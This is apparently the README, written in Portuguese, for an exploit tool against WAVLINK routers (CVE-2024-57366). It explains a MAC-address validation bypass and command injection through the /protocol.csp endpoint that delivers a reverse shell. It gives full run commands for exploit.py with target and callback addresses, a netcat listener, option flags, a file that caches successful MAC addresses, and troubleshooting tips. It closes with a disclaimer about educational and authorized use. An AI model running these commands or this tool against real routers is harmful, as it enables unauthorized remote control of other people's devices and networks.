
Exploração de execução remota de código para CVE-2024-57366 direcionada a roteadores WAVLINK por meio de bypass de validação de endereço MAC e injeção de comandos, com registro automático em WiFi e entrega de payload de shell reverso.
Um exploit robusto para CVE-2024-57366 que permite execução remota de código em roteadores vulneráveis através de bypass de validação de endereço MAC e injeção de comandos.
Este é um exploit pós-autorização que requer que o recurso "Controle Remoto" do roteador esteja ativado e a senha administrativa. O nome de usuário administrativo é codificado como "admin".
sudo (necessário para gerenciamento de interface de rede)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# O script perguntará: "Use cached MAC for quick exploit? (y/n):" - responda "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - Endereço IP do roteador alvo (padrão: 127.0.0.1)--port - Porta do roteador alvo (padrão: 80)--local-ip - Seu endereço IP local para callback reverse shell--local-port - Porta local para callback reverse shell (padrão: 4444)--password - Senha de administrador do roteador--ssid - Nome da rede WiFi (padrão: WAVLINK-Mesh_DC4B)--force-full - Forçar exploit completo, ignorar verificação de MAC em cache--list-cached - Listar endereços MAC em cache e sairO CVE-2024-57366 explora um bypass de validação de endereço MAC no firmware do roteador. A vulnerabilidade permite injeção de comandos através do parâmetro mac no endpoint /protocol.csp.
eth0 para preservar o contexto de rede originalindex=1, token no caminho da URL)O exploit armazena automaticamente endereços MAC bem-sucedidos em successful_macs.txt:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
Adição Manual de MAC: Edite successful_macs.txt e adicione linhas como:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Inicie o listener netcat
nc -lvp 4444
# Execute o exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Quando solicitado a salvar o endereço MAC, responda "y"
# Inicie o listener netcat
nc -lvp 4444
# Execute o exploit (usará MAC em cache)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Responda "y" quando perguntado sobre usar MAC em cache
"Nenhum adaptador sem fio encontrado"
sudo"Falha na validação do endereço MAC"
"Requisição expirou"
"Reverse shell não está conectando"
--local-ip está correto (use ip addr show eth0)CVE-2024-57366/
├── exploit.py # Script principal do exploit
├── successful_macs.txt # Cache de endereço MAC (gerado automaticamente)
└── README.md # Este arquivo
Esta ferramenta é apenas para fins educacionais e de teste autorizado. Use apenas em sistemas que você possui ou tem permissão explícita para testar. Os autores não são responsáveis por qualquer uso indevido desta ferramenta.
/protocol.cspEste projeto é fornecido como está para fins educacionais. Use com responsabilidade e de acordo com as leis e regulamentos aplicáveis.